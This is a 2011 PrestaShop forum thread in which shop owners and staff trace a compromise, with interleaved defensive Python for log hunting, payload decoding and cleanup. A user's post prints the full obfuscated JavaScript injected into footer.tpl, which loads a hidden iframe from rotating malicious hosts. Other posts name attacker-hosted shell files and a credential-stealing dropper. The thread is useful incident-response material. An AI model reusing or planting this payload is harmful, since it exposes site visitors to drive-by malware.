Xenocide Posted August 24, 2011
This is one of my live sites that's been hacked. Hacker's IP was: 91.143.79.106. This is the access logs grepped for that IP:
/themes/<mytheme>/footer.tpl was modified
/download/ had a php file with a filename that looked like an md5 string
/upload/ had a php file with a filename that looked like an md5 string
/tools/smarty_v2 was deleted (deleted whole folder)
/tools/smarty was modified
NO /modules/her.php
Oh, to add: the files that were created had a modified time of 04:31.
Have you checked your IP? (myip.dk)
Yes I have, I'm trying to get the other shop admin to check theirs. Interestingly they're using a Mac, so the idea of malware on the machine may not work. (You can see the UA in the logs.)
ruilong Posted August 24, 2011
I work for a hosting company and have been trying to track this down. The her.php file is accessed via an ajax request and contains the code in the first page of this thread, which downloads the malicious files to upload/ and download/, then deletes the smarty folders and emails admin login data to the attacker. I can't find what creates her.php initially, but in every instance I've seen, it immediately follows an admin login and a click of an admin tab button. Because it's done via ajax that implies the code in footer.tpl is the source, but I can't find how this is created. To prevent the attack I've put in place an auto_prepend_file which simply does a mail() of $_SERVER then calls die() if it detects it's the her.php file which is being executed, but this is only stopping the effect rather than the cause. One theory I have is that it's a virus on the Prestashop administrator's PC which is using the admin area to edit templates (because it always picks the right template rather than doing all templates) and that code is subsequently called on the next page view.
All attacks have a POST to /adminfolder/ajax.php, then on the next request for a tab her.php is subsequently called, for example:
ip - - [24/Aug/2011:08:53:52 +0100] "POST /shop/admin123/ajax.php HTTP/1.1" 200 20 "http://www.site.net/shop/admin123/"
ip - - [24/Aug/2011:08:53:53 +0100] "POST /shop/admin123/index.php?tab=AdminModules&token=a088c4e2726917d74b2635984e6af501 HTTP/1.1" 200 20085 "http://www.site.net/shop/admin123/"
ip - - [24/Aug/2011:08:53:54 +0100] "GET /shop/modules/her.php HTTP/1.1" 200 20 "http://www.site.net/shop/admin123/"
In terms of tracking down activity I'd possibly advise adding code which mails / logs the contents of $_POST and $_SERVER on every request to /adminfolder/index.php and /adminfolder/ajax.php, as that should give a clue as to what's happening, but the niggle is it still doesn't explain how the content (which causes the malicious GET) was added to footer.tpl.

It's a POST to the AdminModules tab (not a click), so it's probably posting a URL to download a module from; this zip/tar file is then extracted to the modules folder with the her.php file. Then a call to her.php is made to execute the script. As for the footer.tpl, this file should not be writable unless the theme was uploaded through the theme installer (then the Apache process would own the files in the theme folder).
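The request sequence ruilong describes above (a POST to ajax.php, a POST to the AdminModules tab, then a GET of /modules/her.php from the same client within a couple of seconds) can be hunted in access logs. The following is an added example, not code from the thread or from PrestaShop: it parses Apache combined-format lines, groups them per client IP and reports each her.php hit together with whether the admin ajax.php and admin tab POSTs preceded it within a short window, and separately flags hits on md5-named PHP files in upload/ and download/. The log lines embedded in it are constructed for the example, patterned after the ones quoted in the post; the hostnames, IPs and token are placeholders.

```python
"""Hunt the her.php infection chain in Apache access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format, as in the lines quoted in the post above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
ADMIN_AJAX = re.compile(r"/ajax\.php$")
ADMIN_TAB = re.compile(r"/index\.php\?tab=Admin")
DROPPER = re.compile(r"/modules/her\.php(?:\?.*)?$")
# The dropped shells in upload/ and download/ had md5-looking file names.
HASH_SHELL = re.compile(r"/(?:upload|download)/[0-9a-f]{32}\.php(?:\?.*)?$")

# Constructed sample, patterned after the lines in the post (placeholder hosts, IPs, token).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Aug/2011:08:53:50 +0100] "GET /shop/admin123/index.php HTTP/1.1" 200 15001 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Aug/2011:08:53:52 +0100] "POST /shop/admin123/ajax.php HTTP/1.1" 200 20 "http://shop.example.net/shop/admin123/" "Mozilla/5.0"
192.0.2.10 - - [24/Aug/2011:08:53:53 +0100] "POST /shop/admin123/index.php?tab=AdminModules&token=0000000000000000 HTTP/1.1" 200 20085 "http://shop.example.net/shop/admin123/" "Mozilla/5.0"
192.0.2.10 - - [24/Aug/2011:08:53:54 +0100] "GET /shop/modules/her.php HTTP/1.1" 200 20 "http://shop.example.net/shop/admin123/" "Mozilla/5.0"
198.51.100.7 - - [24/Aug/2011:08:55:10 +0100] "GET /shop/product.php?id_product=3 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Aug/2011:09:12:01 +0100] "GET /shop/upload/0cc175b9c0f1b6a831c399e269772661.php HTTP/1.1" 200 277 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_infection_chains(lines, window_seconds=30):
    """Return {"chains": [...], "shell_hits": [...]}.

    A chain is one request for /modules/her.php plus the POSTs the same client made
    in the preceding window; admin_ajax / admin_tab record whether the two admin
    requests the post describes were among them. shell_hits are requests for the
    md5-named PHP files, whatever preceded them."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    chains, shell_hits = [], []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, rec in enumerate(recs):
            if DROPPER.search(rec["path"]):
                since = rec["ts"] - timedelta(seconds=window_seconds)
                prior = [r for r in recs[:i] if r["ts"] >= since and r["method"] == "POST"]
                chains.append({
                    "ip": ip,
                    "dropper_at": rec["ts"].isoformat(),
                    "status": rec["status"],
                    "admin_ajax": any(ADMIN_AJAX.search(r["path"]) for r in prior),
                    "admin_tab": any(ADMIN_TAB.search(r["path"]) for r in prior),
                    "referer": rec["referer"],
                })
            elif HASH_SHELL.search(rec["path"]):
                shell_hits.append({"ip": ip, "at": rec["ts"].isoformat(),
                                   "path": rec["path"], "status": rec["status"]})
    return {"chains": chains, "shell_hits": shell_hits}


if __name__ == "__main__":
    import json
    print(json.dumps(find_infection_chains(SAMPLE_LOG.splitlines()), indent=2))
```

Run it over a real log with `find_infection_chains(open("/path/to/access.log"))`. A chain with both admin_ajax and admin_tab true is the pattern the post describes; a chain whose her.php request returned 404 with the same preceding POSTs is still worth keeping, since a rewrite rule that blocks her.php produces exactly that and the admin session that triggered it is the thing to investigate.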
designguy79 Posted August 24, 2011
One theory I have is that it's a virus on the Prestashop administrator's PC which is using the admin area to edit templates
That would be quite the trick; I am using OSX 10.6.8 and have Kaspersky Anti-virus, and I know others having problems are on Windows. Can anyone else chime in who is using Ubuntu or something?

fraolsmae Posted August 24, 2011
We were affected as well. v1.4.3. This is bad!! I have an earlier backup of the database and the shop. I tried to take the last backup, and then delete the older database and import the older database, but this didn't help. Tips on how I should do this right? Frank

Carl Favre Posted August 24, 2011
Hi everyone, Some good news! The problem has been fixed. It will not spread anymore. For those who have had this issue, please contact us at: [email protected] For now we are working on a fix so you can easily remove all the infected files. We will give more information a bit later. From all the Team, thanks again for your cooperation and patience.

thehandlestudio Posted August 24, 2011
Is there any chance of an update from the PS developers please? Regards, Mark. Edit: sorry, you beat me to it....

Burhan BVK Posted August 24, 2011
To prevent this attack you can add the following line to your htaccess file:
RewriteRule ^modules/her.php(.*)$ 404.php [QSA,L]
With this, even if her.php is created, it is never executed. From what I read so far, this seems like a javascript exploit on the back office page. I think some javascript code is using your own session to upload her.php to your server.

Xenocide Posted August 24, 2011
Cheers Carl - I've just emailed you

Carl Favre Posted August 24, 2011
Thanks.

Kamel Boukhateb Posted August 24, 2011
To prevent this attack you can add the following line to your htaccess file: RewriteRule ^modules/her.php(.*)$ 404.php [QSA,L] With this, even if her.php is created, it is never executed. From what I read so far, this seems like a javascript exploit on the back office page. I think some javascript code is using your own session to upload her.php to your server.
This is useless now. We fixed it and as we said, it won't spread anymore. However there's still the problem of those already infected. Try to change all passwords of your shop or contact us at: [email protected]

jesusruiz Posted August 24, 2011
That's fast troubleshooting. If the world were controlled by the people of Prestashop, it would be perfect. Carl, thanks to you, and all the Prestashop team.

Xenocide Posted August 24, 2011
Best to move your admin panel too if the information has been transmitted back to someone else, no?
manouille Posted August 24, 2011
Hi everyone, Some good news! The problem has been fixed. It will not spread anymore. For those who have had this issue, please contact us at: [email protected] For now we are working on a fix so you can easily remove all the infected files. We will give more information a bit later. From all the Team, thanks again for your cooperation and patience.
Strange files in the upload and download directory. Is there another? Sorry for bad English!

Xenocide Posted August 24, 2011
Strange files in the upload and download directory. Is there another? Sorry for bad English!
/upload/?.php
/download/?.php
/modules/her.php
/themes/<themename>/footer.tpl code removal
and the files to fix the exploit, I guess.

manouille Posted August 24, 2011
Clear cache, maybe?

Raphaël Malié Posted August 24, 2011
You should also change your employees' account passwords, and if possible your MySQL password; this is always a good precaution to take after this kind of issue. Regards

randori Posted August 24, 2011
Email sent! Hopefully it will work!

indus Posted August 24, 2011
I sent an email to [email protected]. I changed the admin password; I don't have other employees. But I don't know how to change SQL passwords. I am on shared hosting. Can I change it from the back office under database? This changes the password for the database user, isn't it? I am also eagerly waiting to hear how this whole thing happened.

emilioSH Posted August 24, 2011
I sent email too.

das-schaf Posted August 24, 2011
I am also infected, what should I do? I deleted the her.php, changed all passwords and removed the code in the footer. thx tobi

indus Posted August 24, 2011
I don't understand what deleting these files does to solve the original problem. If this happened before, then it can be created again whether you change your passwords or not.

Raphaël Malié Posted August 24, 2011
Hello Indus, you should contact your host provider to ask him to change your MySQL password, then set the new password in your config/settings.inc.php file.
[PrestaModule] JS Posted August 24, 2011
Hi, I contacted the webmaster of http://www.c2bill.it/ asking him to remove the files "http://www.c2bill.it/stest/chkpnt/shell.txt" and "http://www.c2bill.it/stest/chkpnt/sdata.php". He did it a few hours ago. Hope this may slow attacks.

feltu Posted August 24, 2011
Hi, we have over 10,000 members and orders in our prestashop database. I have sent you an email, please help urgently. thanks

Raphaël Malié Posted August 24, 2011
Hello [PrestaModule] JS, really, thank you for your help! And as Carl said before, the problem is now totally fixed; don't forget to contact [email protected] if you were infected and need help and information. Best regards

hege Posted August 24, 2011
fyi There was an attack on my site at 08.23 18:21 and then I:
- removed the files, replaced footer.tpl,
- updated the employees' passwd
- changed the directory of the admin page
- removed the "send attachment" on the contact
- added tpl protection in the htaccess
- changed the ftp and sql passwords
- commented out the extractarchive in the admin module (changed might be after the second hack)
now I found the her.php at ten o'clock, but nothing else found... (no new file, no modification...) regards, Gabor

[PrestaModule] JS Posted August 24, 2011
Hi Raphaël, Thank you and all the PrestaTeam for the quick fix. We've already sent an email to [email protected]. Regards

shacker Posted August 24, 2011
I use the RSI Protect module to protect tpl files, and don't leave the htaccess file with write permissions.

MokaDev Posted August 24, 2011
Hi, Prestashop Team, I sent an email to [email protected]. When do you think we'll receive the fix? best regards

AKJV Posted August 24, 2011
Dear Prestashop developers, I've also sent out an email to the aforementioned email address and am eagerly awaiting more info. But in the meantime, could you at least tell us whether the permanent resolution to this issue implies a soon to be released update to some Prestashop files? Or is it something that was fixed from your end so that uninfected installations do not have to worry about future infections? This info will put uninfected users at ease (well, that is when no update needs to be applied).

Metameme Posted August 24, 2011
I helped Philee with his store and we also found that additional IP addresses had been added to the maintenance IP field. Might be good to check that as well...

hege Posted August 24, 2011
Hi, Prestashop Team, I sent an email to [email protected]. When do you think we'll receive the fix? best regards
I think in minutes... but lots of people have sent a mail to them. As [PrestaModule] JS said, the page where the malicious code sent the site information is no longer available, so don't panic. Thanks to the PS team and other guys for solving this issue so fast...
henric Posted August 24, 2011
I just got my site back. Vidahost had tried to replace the tools and I still had problems with the security access error page when opening in a web browser.

indus Posted August 24, 2011
Hi, I just noticed that my smarty cache and compile folders had 771 permissions. I changed it to 755. Not sure if this is related though.

feltu Posted August 24, 2011
Dear Prestashop, been sitting in front of the PC for the past hour waiting for the email to be replied to. Hope that a solution can be sent asap. thanks

jcerdan Posted August 24, 2011
Hi, I've been hacked too. Changed the footer.tpl and deleted files from upload/ and download/. Hope to see a security fix soon! Anyway, is there a doc describing security actions to take when installing a new Prestashop? Folder permissions, file permissions, etc...

LinnB Posted August 24, 2011
I got this google warning right after writing "prestashop malware" in google, as I just got the same message with my website. What's going on??
spidermax Posted August 24, 2011
I was infected. Had the extra download files, well two extra, so they're deleted. footer.tpl had extra added to it so have removed that, just waiting on [email protected] to get back to me to tell me if I have to change anything else. Hope everyone gets sorted. I found removing the extra code (at the bottom of the post) from the footer.tpl file stopped the virus warnings.
{literal}<script>String.prototype.asd=function(){return String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v[i].length+1;o*=2;e=eval;m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);</script>{/literal}
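The obfuscated script spidermax posted above can be decoded without running it in a browser. What follows is an added example, not code from the thread or from PrestaShop: it strips the "-o" from the integer table, subtracts the value the script computes for o, and reproduces the hostname logic of the decoded payload. The table is copied from the post; the key derivation is read off the script itself: o is document.createTextNode('asd').childNodes.length + 1, doubled, and a text node never has children, so o is always 2 in a browser (the DOM lookup, like the try/catch over Object.prototype before it, is there to break non-browser emulators, not to vary the key). The decoded payload writes a zero-size iframe whose hostname is "clickme" + one letter derived from the day of the month + one letter derived from the local hour + ".fileave.com", which matches the clickmemq.fileave.com that Avast reports later in this thread (the 24th at 16:00 local). hosts_for_day is my own addition that enumerates a day's full set for a blocklist or a proxy-log search.

```python
"""Static decode of the footer.tpl injection quoted above (added example)."""
import re

# The m=[...] table from the injected script, copied from the post. Every entry
# is "N-o"; the script derives o at run time from the DOM (see runtime_key).
RAW_TABLE = (
    "120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,"
    "120-o,99-o,116-o,34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,"
    "34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,"
    "102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o"
)


def runtime_key():
    """The value of o the script computes in a real browser.

    Script: v=document.createTextNode('asd'); o=v.childNodes.length+1; o*=2
    A text node has no child nodes, so o is (0 + 1) * 2 == 2. In a sandbox whose
    fake DOM lacks childNodes, o stays undefined and the decode yields garbage,
    which is the point of deriving it from the DOM."""
    return (0 + 1) * 2


def decode(raw_table=RAW_TABLE, key=None):
    """Rebuild the string the script passes to eval() from the integer table."""
    key = runtime_key() if key is None else key
    return "".join(chr(int(n) - key) for n in re.findall(r"(\d+)-o", raw_table))


def iframe_host(day, hour):
    """Mirror of the decoded payload's hostname construction.

    Decoded JS: x=String.fromCharCode(Math.floor(d.getDate()/2)+97);
                y=String.fromCharCode(d.getHours()+97);
                "http://clickme"+x+y+".fileave.com" """
    return f"clickme{chr(day // 2 + 97)}{chr(hour + 97)}.fileave.com"


def hosts_for_day(day):
    """All 24 hostnames the payload can produce on one day of the month
    (one per local hour). Added for blocklisting; not part of the payload."""
    return [iframe_host(day, h) for h in range(24)]


if __name__ == "__main__":
    print(decode())
    print(iframe_host(24, 16))  # the host Avast flagged in this thread
```

Because the hostname changes every hour, blocking a single observed host (clickmemq.fileave.com) does nothing for the next hour's visitors; block the pattern, or search proxy logs for the whole set hosts_for_day returns for the days the template was live.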
MokaDev Posted August 24, 2011
I got this google warning right after writing "prestashop malware" in google, as I just got the same message with my website. What's going on??
WTF?? If prestashop.com is infected, maybe the problem comes from the back office which contacts some of prestashop's URLs. That would explain why I noticed in the Apache access log that the her.php file was created and accessed a few seconds after my customer logged in to the back office. That would explain why the prestashop security team does not respond to our mails?

Metameme Posted August 24, 2011
People, do please read the full thread before asking questions. //Mike

titooooom Posted August 24, 2011
I am using Linux and Windows. I'm curious, for those infected, what operating system do you use? I'm working on OSX 10.5.8 and for hosting this is Linux Apache/2.2.14 (Unix) PHP: 5.2.5 MySQL: 5.1.44 Thanks

MokaDev Posted August 24, 2011
I got this google warning right after writing "prestashop malware" in google, as I just got the same message with my website. What's going on??
WTF?? If prestashop.com is infected, maybe the problem comes from the back office which contacts some of prestashop's URLs. That would explain why I noticed in the Apache access log that the her.php file was created and accessed a few seconds after my customer logged in to the back office. That would explain why the prestashop security team does not respond to our mails?
hehe, that would explain why the local version of the shop (on a dev server) is infected too...

shacker Posted August 24, 2011
I got this google warning right after writing "prestashop malware" in google, as I just got the same message with my website. What's going on??
This is the attached file, that is the malware, not prestashop.com.

treebeard Posted August 24, 2011
A customer of ours was hacked, too. We removed all malicious code from footer.tpl, etc. and sent an email to [email protected] But please explain: what caused the infection in the Back Office? Please give us more details. For our German customers we are translating and summarizing this issue on http://www.prestashop-tutorials.de/sicherheitsluecke-prestashop-1-4/

Xenocide Posted August 24, 2011
I got this google warning right after writing "prestashop malware" in google, as I just got the same message with my website. What's going on??
WTF?? If prestashop.com is infected, maybe the problem comes from the back office which contacts some of prestashop's URLs. That would explain why I noticed in the Apache access log that the her.php file was created and accessed a few seconds after my customer logged in to the back office. That would explain why the prestashop security team does not respond to our mails?
hehe, that would explain why the local version of the shop (on a dev server) is infected too...
It certainly would; might also explain why prestashop.com wasn't loading properly earlier and why the dev team was able to just say "we've stopped it and it won't happen again" without issuing any code changes. I don't really mind that much, it's an honest mistake. But I'd like to know what the vulnerability was either way.

indus Posted August 24, 2011
I got this google warning right after writing "prestashop malware" in google, as I just got the same message with my website. What's going on??
WTF?? If prestashop.com is infected, maybe the problem comes from the back office which contacts some of prestashop's URLs. That would explain why I noticed in the Apache access log that the her.php file was created and accessed a few seconds after my customer logged in to the back office. That would explain why the prestashop security team does not respond to our mails?
hehe, that would explain why the local version of the shop (on a dev server) is infected too...
It certainly would; might also explain why prestashop.com wasn't loading properly earlier and why the dev team was able to just say "we've stopped it and it won't happen again" without issuing any code changes. I don't really mind that much, it's an honest mistake. But I'd like to know what the vulnerability was either way.
Probably comes from the videos and news links on the back office page.

StanRow Posted August 24, 2011
According to what I could read on the French forum, the issue comes from the RSS feed displayed right after the administrator's login. They fixed the feed, therefore stopped the propagation of the malware/virus.
Carl Favre Posted August 24, 2011
Hi, Right now, we are writing a more detailed answer explaining the causes and what to do to fix your shop. Please, be a little more patient, just to give us the time to write a comprehensive answer for all of you. Be assured that so far the issue is fixed and cannot be spread anymore. Thanks again for your patience.

phrasespot Posted August 24, 2011
if prestashop.com is infected maybe the problem comes from the back office which contacts some prestashop URLs.
This is actually not a bad assessment as to what may have been wrong, seeing the prevalence of the localhost infections. Even if it was not, there are at least half a dozen places in the code where content from prestashop.com is pulled, and every single installation out there is at the mercy of the security of prestashop.com and its subdomains. I understand the wish to collect stats/referrer points/affiliate credits etc., but Prestashop should seriously reconsider including code that pulls stuff from other domains, including their own. Any security-conscious admin removes those sections from the code as soon as it is installed anyway. The alternative is that a situation like this one may arise anytime. Just my two cents.

Xenocide Posted August 24, 2011
Cool, thanks for the answer Carl.

fancydressqueen Posted August 24, 2011
We're in the same boat, hoping for a solution asap!

BODYL Posted August 24, 2011
Also happening in 1.4.4. Is there news about a patch? URGENT !!!

indus Posted August 24, 2011
Also happening in 1.4.4. Is there news about a patch? URGENT !!!
Yes. For now, just delete the strange php files in the upload and download folders and delete the javascript inside footer.tpl in themes. Also change the admin back office login and the database passwords, because the exploit seems to read the settings.inc.php file which has those details.

BODYL Posted August 24, 2011
Thanks

christmascrackers Posted August 24, 2011
I've removed the files and updated the footer.tpl as instructed. But my site is being flagged by Avast as infected by a trojan:
Infection Details
URL: http://clickmemq.fileave.com/
Process: file://C:\Program Files\Mozilla Firefox\...
Infection: js:Redirector-IY [Trj]
Warn your friends to avoid this website
Nice of them to put a twitter button there for everyone to tweet to avoid my site. I'm assuming this is related to the virus which was on my shop. Anyone have any suggestions why this malware is still present despite me removing everything as instructed?

AKJV Posted August 24, 2011
I've removed the files and updated the footer.tpl as instructed. But my site is being flagged by Avast as infected by a trojan: Infection Details URL: http://clickmemq.fileave.com/ Process: file://C:\Program Files\Mozilla Firefox\... Infection: js:Redirector-IY [Trj] Warn your friends to avoid this website Nice of them to put a twitter button there for everyone to tweet to avoid my site. I'm assuming this is related to the virus which was on my shop. Anyone have any suggestions why this malware is still present despite me removing everything as instructed?
Did you do a 'Force compile' and clear the cache after restoring your footer.tpl?

dazzza Posted August 24, 2011
The infected footer.tpl file will still reside in tools > smarty > compile. Delete it from there as well!! And replace the affected/deleted files BEFORE changing your admin & SQL password, or when you log in to BO the virus will send your login details AGAIN.
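The cleanup steps spread over the posts above (indus and dazzza: delete the md5-named PHP files in upload/ and download/ and modules/her.php, remove the script from themes/*/footer.tpl, and remove the compiled copy Smarty keeps under tools/smarty/compile) can be made repeatable. The following is an added example, not code from the thread or from PrestaShop. It scans a shop tree for those artefacts, notes the smarty_v2 folder the first post reports deleted, and quarantines what it finds rather than deleting it: dropped files are moved aside with their paths preserved, and only the {literal}<script>String.prototype.asd ... </script>{/literal} block is cut out of footer.tpl, with a copy of the original kept, so the evidence survives for the host or for PrestaShop's support address. The demo() function builds a small constructed shop tree in a temporary directory, with placeholder file contents, to show the scan before and after quarantine. The maintenance-IP field Metameme mentions lives in the database and is not covered here.

```python
"""Find and quarantine the artefacts of the footer.tpl / her.php infection (added example)."""
import re
import shutil
import tempfile
from pathlib import Path

MARKER = "String.prototype.asd"          # distinctive opening of the injected script
HASH_NAME = re.compile(r"^[0-9a-f]{32}\.php$")
INJECTION = re.compile(
    r"\{literal\}\s*<script>\s*String\.prototype\.asd.*?</script>\s*\{/literal\}", re.DOTALL
)


def scan_shop(root):
    """Return sorted (kind, relative_path) findings for one PrestaShop install."""
    root = Path(root)
    findings = []
    if (root / "modules" / "her.php").is_file():
        findings.append(("dropper", "modules/her.php"))
    for d in ("upload", "download"):
        if (root / d).is_dir():
            for f in (root / d).glob("*.php"):
                if f.is_file() and HASH_NAME.match(f.name):
                    findings.append(("shell", f.relative_to(root).as_posix()))
    for tpl in root.glob("themes/*/footer.tpl"):
        if MARKER in tpl.read_text(errors="replace"):
            findings.append(("injected_template", tpl.relative_to(root).as_posix()))
    # Smarty's compiled PHP copy keeps serving the script until the template is recompiled.
    for compiled in root.glob("tools/smarty*/compile/**/*.php"):
        if MARKER in compiled.read_text(errors="replace"):
            findings.append(("injected_compiled_template", compiled.relative_to(root).as_posix()))
    if not (root / "tools" / "smarty_v2").is_dir():
        findings.append(("missing", "tools/smarty_v2"))
    return sorted(findings)


def quarantine(root, findings, dest):
    """Move dropped files into dest (keeping relative paths); for an injected
    template, keep a copy in dest and cut only the script block out of the live file."""
    root, dest = Path(root), Path(dest)
    for kind, rel in findings:
        if kind == "missing":
            continue
        src, saved = root / rel, dest / rel
        saved.parent.mkdir(parents=True, exist_ok=True)
        if kind == "injected_template":
            shutil.copy2(src, saved)
            src.write_text(INJECTION.sub("", src.read_text(errors="replace")))
        else:
            shutil.move(str(src), str(saved))


def demo():
    """Build a constructed shop tree (placeholder contents), scan, quarantine, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root, q = Path(tmp) / "shop", Path(tmp) / "quarantine"
        bad_js = ("{literal}<script>String.prototype.asd=function(){return String.fromCharCode;};"
                  "e(s);</script>{/literal}")
        files = {
            "modules/her.php": "<?php /* constructed stand-in for the dropper */ ?>",
            "upload/0cc175b9c0f1b6a831c399e269772661.php": "<?php /* constructed */ ?>",
            "download/92eb5ffee6ae2fec3ad71c777531578f.php": "<?php /* constructed */ ?>",
            "upload/.htaccess": "deny from all",
            "themes/mytheme/footer.tpl": '<div id="footer">{$copyright}</div>\n' + bad_js + "\n",
            "tools/smarty/compile/ab/footer.tpl.php": "<?php echo '<div>'; ?>" + bad_js,
            "tools/smarty/compile/ab/header.tpl.php": "<?php echo '<div>'; ?>",
        }
        for rel, body in files.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
        before = scan_shop(root)
        quarantine(root, before, q)
        after = scan_shop(root)
        footer_clean = MARKER not in (root / "themes/mytheme/footer.tpl").read_text()
        return before, after, footer_clean


if __name__ == "__main__":
    before, after, footer_clean = demo()
    print("before:", before)
    print("after:", after, "footer clean:", footer_clean)
```

Point scan_shop at the real shop root first and read the findings before quarantining anything. After quarantine, do the Force compile / clear cache step AKJV asks about, and only then change the employee and MySQL passwords, in the order dazzza gives, so the next back-office login does not re-send the new credentials.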
christmascrackers Posted August 24, 2011 Share Posted August 24, 2011 As soon as I sent this I remembered the cache needed clearing and it's worked, thanks. Link to comment Share on other sites More sharing options...
kvnkain Posted August 24, 2011 Share Posted August 24, 2011 I found this I was also infected this is some kind of Institute as prestashop hackiar look!. http://pastebin.com/q5Dz0gKt Link to comment Share on other sites More sharing options...
lucass Posted August 24, 2011 Share Posted August 24, 2011 does this injection anyhow threatens customers computers? or admin computers? Or, is it only on server side? Link to comment Share on other sites More sharing options...
tobes Posted August 24, 2011 Share Posted August 24, 2011 I too have suffered this, on two sites. One is still down as the permissions on the /modules/ folder seem to have been changed, and I'm waiting for an admin to fix that. Looking forward to hearing more about the causes of this and the steps necessary to prevent it happening again. If there's anything in the logs which would still be useful to anyone, let me know. --Toby Link to comment Share on other sites More sharing options...
LinnB Posted August 24, 2011 Share Posted August 24, 2011 I've removed the files and updated the footer.tpl as instructed. But my site is being flagged by Avast as infected by a trojan: Infection Details URL: http://clickmemq.fileave.com/ Process: file://C:\Program Files\Mozilla Firefox\... Infection: js:Redirector-IY [Trj] Warn your friends to avoid this website Nice of them to put a twitter button there for everyone to tweat to avoid my site. I'm assuming this is related to the virus which was on my shop. Anyone have any suggestions why this malware is still present depsite me removing everything as instructed. I went to your site and Norton detected an attack from vipaquarium.ka.hn, the same happened when I went on my site. Link to comment Share on other sites More sharing options...
chemapresta Posted August 24, 2011 Share Posted August 24, 2011 Hello, can you search in your full log apache the word "her.php" and copy all found lines here ? If you are under linux : cat /path/to/your/apache/log | grep "her.php" ok, here you are... ### logs$ cat apache.log | grep "her.php" 213.98.113.74 - - [23/Aug/2011:15:06:01 +0200] "GET /tienda/modules/her.php HTTP /1.1" 200 277 "https://myshop.com/tienda/admin123/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0.1) Gecko/20100101 Firefox/5.0.1" 1221 ### Link to comment Share on other sites More sharing options...
dazzza Posted August 24, 2011 Share Posted August 24, 2011 does this injection anyhow threatens customers computers? or admin computers? Or, is it only on server side? I think it's a server side problem on the whole. But if you're running test sites or building templates on a localhost server like wamp or xampp it'll be on your PC. Link to comment Share on other sites More sharing options...
